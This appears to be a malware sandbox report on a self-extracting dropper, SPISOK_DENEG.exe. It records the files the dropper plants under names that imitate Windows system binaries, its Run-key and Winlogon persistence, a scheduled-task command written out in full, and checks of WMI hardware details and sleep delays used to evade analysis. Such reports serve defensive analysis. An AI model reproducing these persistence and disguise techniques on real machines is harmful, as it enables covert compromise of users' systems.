                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeSection loaded: cryptbase.dll
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeSection loaded: sspicli.dll
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeSection loaded: mscoree.dll
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeSection loaded: apphelp.dll
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeSection loaded: version.dll
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeSection loaded: uxtheme.dll
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeSection loaded: windows.storage.dll
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeSection loaded: wldp.dll
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeSection loaded: profapi.dll
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeSection loaded: cryptsp.dll
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeSection loaded: rsaenh.dll
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeSection loaded: cryptbase.dll
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeSection loaded: mscoree.dll
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeSection loaded: version.dll
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeSection loaded: uxtheme.dll
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeSection loaded: windows.storage.dll
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeSection loaded: wldp.dll
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeSection loaded: profapi.dll
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeSection loaded: cryptsp.dll
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeSection loaded: rsaenh.dll
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeSection loaded: cryptbase.dll
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                                  Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dll
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dll
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dll
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dll
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dll
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dll
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dll
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dll
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: mscoree.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: kernel.appcore.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: version.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: uxtheme.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: windows.storage.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: wldp.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: profapi.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: cryptsp.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: rsaenh.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: cryptbase.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: sspicli.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: mscoree.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: kernel.appcore.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: version.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: uxtheme.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: windows.storage.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: wldp.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: profapi.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: cryptsp.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: rsaenh.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: cryptbase.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: sspicli.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: mscoree.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: kernel.appcore.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: version.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: uxtheme.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: windows.storage.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: wldp.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: profapi.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: cryptsp.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: rsaenh.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: cryptbase.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: sspicli.dll
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                                  Source: Window RecorderWindow detected: More than 3 window changes detected
                                  Source: SPISOK_DENEG.exeStatic file information: File size 1166640 > 1048576
                                  Source: SPISOK_DENEG.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                  Source: SPISOK_DENEG.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                  Source: SPISOK_DENEG.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                  Source: SPISOK_DENEG.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                  Source: SPISOK_DENEG.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                  Source: SPISOK_DENEG.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                  Source: SPISOK_DENEG.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                  Source: SPISOK_DENEG.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                  Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: SPISOK_DENEG.exe
                                  Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ji1uplb1\ji1uplb1.pdb source: ChainPortsurrogate.exe, 00000004.00000002.1795261903.00000000033B3000.00000004.00000800.00020000.00000000.sdmp
                                  Source: SPISOK_DENEG.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                  Source: SPISOK_DENEG.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                  Source: SPISOK_DENEG.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                  Source: SPISOK_DENEG.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                  Source: SPISOK_DENEG.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ji1uplb1\ji1uplb1.cmdline"
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ji1uplb1\ji1uplb1.cmdline"Jump to behavior
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeFile created: C:\ProviderserverruntimeperfSvc\__tmp_rar_sfx_access_check_3820328Jump to behavior
                                  Source: SPISOK_DENEG.exeStatic PE information: section name: .didat
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeCode function: 0_2_000EF640 push ecx; ret 0_2_000EF653
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeCode function: 0_2_000EEB78 push eax; ret 0_2_000EEB96
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeCode function: 4_2_00007FFD9BA0FB02 pushad ; ret 4_2_00007FFD9BA0FB03
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeCode function: 4_2_00007FFD9BA08163 push ebx; ret 4_2_00007FFD9BA0816A

Persistence and Installation Behavior

Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create (18 identical entries in the report)
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | File created: C:\Program Files (x86)\jDownloader\config\explorer.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | System file written: C:\Windows\System32\SecurityHealthSystray.exe
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | File created: C:\Users\Default\Documents\dllhost.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Windows\System32\SecurityHealthSystray.exe
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | File created: C:\Users\user\Desktop\CqAggkYA.log
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | File created: C:\Users\user\Desktop\UxRLAXDP.log
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | File created: C:\Windows\debug\backgroundTaskHost.exe
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | File created: C:\Users\user\Desktop\tHgRxHTS.log
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | File created: C:\Users\user\Desktop\jYNBNfNl.log
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | File created: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | File created: C:\Users\user\Desktop\YsSdHCtI.log
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | File created: C:\ProviderserverruntimeperfSvc\ctfmon.exe
Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | File created: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe

Boot Survival

Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run backgroundTaskHost
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell (6 identical entries in the report)
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run EbnrVuXczrPqjyiJGoZ
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ChainPortsurrogate
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dllhost
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ctfmon
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run explorer
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run backgroundTaskHost
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ctfmonc" /sc MINUTE /mo 5 /tr "'C:\ProviderserverruntimeperfSvc\ctfmon.exe'" /f
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run explorer
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dllhost
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ChainPortsurrogate
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ChainPortsurrogateJump to behavior
Source: C:\Users\user\Desktop\SPISOK_DENEG.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProviderserverruntimeperfSvc\ctfmon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\Documents\dllhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe Process information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exe Process information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe Process information set: NOOPENFILEERRORBOX

                                  Malware Analysis System Evasion

                                  Source: C:\Windows\System32\schtasks.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe Memory allocated: 3060000 memory reserve | memory write watch
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe Memory allocated: 1B090000 memory reserve | memory write watch
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exe Memory allocated: 1690000 memory reserve | memory write watch
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exe Memory allocated: 1B1C0000 memory reserve | memory write watch
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exe Memory allocated: BA0000 memory reserve | memory write watch
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exe Memory allocated: 1A890000 memory reserve | memory write watch
                                  Source: C:\Users\Default\Documents\dllhost.exe Memory allocated: 1020000 memory reserve | memory write watch
                                  Source: C:\Users\Default\Documents\dllhost.exe Memory allocated: 1AD30000 memory reserve | memory write watch
                                  Source: C:\Users\Default\Documents\dllhost.exe Memory allocated: 1110000 memory reserve | memory write watch
                                  Source: C:\Users\Default\Documents\dllhost.exe Memory allocated: 1AC20000 memory reserve | memory write watch
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe Memory allocated: E90000 memory reserve | memory write watch
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe Memory allocated: 1A9B0000 memory reserve | memory write watch
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe Memory allocated: 16E0000 memory reserve | memory write watch
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe Memory allocated: 1B320000 memory reserve | memory write watch
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exe Memory allocated: 1140000 memory reserve | memory write watch
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exe Memory allocated: 1AD90000 memory reserve | memory write watch
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exe Memory allocated: F80000 memory reserve | memory write watch
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exe Memory allocated: 1ADE0000 memory reserve | memory write watch
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe Memory allocated: ED0000 memory reserve | memory write watch
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe Memory allocated: 1AC80000 memory reserve | memory write watch
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe Memory allocated: 10A0000 memory reserve | memory write watch
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe Memory allocated: 1AB50000 memory reserve | memory write watch
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe Memory allocated: 2B90000 memory reserve | memory write watch
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe Memory allocated: 1AD70000 memory reserve | memory write watch
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe Thread delayed: delay time: 922337203685477
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exe Thread delayed: delay time: 922337203685477
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exe Thread delayed: delay time: 922337203685477
                                  Source: C:\Users\Default\Documents\dllhost.exe Thread delayed: delay time: 922337203685477
                                  Source: C:\Users\Default\Documents\dllhost.exe Thread delayed: delay time: 922337203685477
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe Thread delayed: delay time: 922337203685477
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe Thread delayed: delay time: 922337203685477
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exe Thread delayed: delay time: 922337203685477
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exe Thread delayed: delay time: 922337203685477
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe Thread delayed: delay time: 922337203685477
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe Thread delayed: delay time: 922337203685477
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe Thread delayed: delay time: 922337203685477
                                  Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exe
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe Dropped PE file which has not been started: C:\Users\user\Desktop\CqAggkYA.log
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe Dropped PE file which has not been started: C:\Users\user\Desktop\UxRLAXDP.log
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe Dropped PE file which has not been started: C:\Users\user\Desktop\tHgRxHTS.log
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe Dropped PE file which has not been started: C:\Users\user\Desktop\jYNBNfNl.log
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe Dropped PE file which has not been started: C:\Users\user\Desktop\YsSdHCtI.log
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exe Evasive API call chain: GetLocalTime,DecisionNodes graph_0-23523
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe TID: 7788 Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exe TID: 7976 Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exe TID: 7568 Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Users\Default\Documents\dllhost.exe TID: 3180 Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Users\Default\Documents\dllhost.exe TID: 4956 Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe TID: 7596 Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe TID: 7692 Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exe TID: 7688 Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exe TID: 7320 Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe TID: 7640 Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe TID: 7620 Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe TID: 7944 Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Windows\System32\schtasks.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                                  Source: C:\Windows\System32\schtasks.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                                  Source: C:\Windows\System32\schtasks.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                  Source: C:\Windows\System32\schtasks.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                  Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe File Volume queried: C:\ FullSizeInformation
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exe File Volume queried: C:\ FullSizeInformation
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exe File Volume queried: C:\ FullSizeInformation
                                  Source: C:\Users\Default\Documents\dllhost.exe File Volume queried: C:\ FullSizeInformation
                                  Source: C:\Users\Default\Documents\dllhost.exe File Volume queried: C:\ FullSizeInformation
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe File Volume queried: C:\ FullSizeInformation
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe File Volume queried: C:\ FullSizeInformation
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exe File Volume queried: C:\ FullSizeInformation
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exe File Volume queried: C:\ FullSizeInformation
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe File Volume queried: C:\ FullSizeInformation
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe File Volume queried: C:\ FullSizeInformation
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe File Volume queried: C:\ FullSizeInformation
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exe Code function: 0_2_000DA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_000DA69B
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exe Code function: 0_2_000EC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_000EC220
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exe Code function: 0_2_000EE6A3 VirtualQuery,GetSystemInfo,0_2_000EE6A3
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe Thread delayed: delay time: 922337203685477
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exe Thread delayed: delay time: 922337203685477
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exe Thread delayed: delay time: 922337203685477
                                  Source: C:\Users\Default\Documents\dllhost.exe Thread delayed: delay time: 922337203685477
                                  Source: C:\Users\Default\Documents\dllhost.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeThread delayed: delay time: 922337203685477
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeThread delayed: delay time: 922337203685477
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeThread delayed: delay time: 922337203685477
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeThread delayed: delay time: 922337203685477
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | File opened: C:\Users\user
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | File opened: C:\Users\user\Documents\desktop.ini
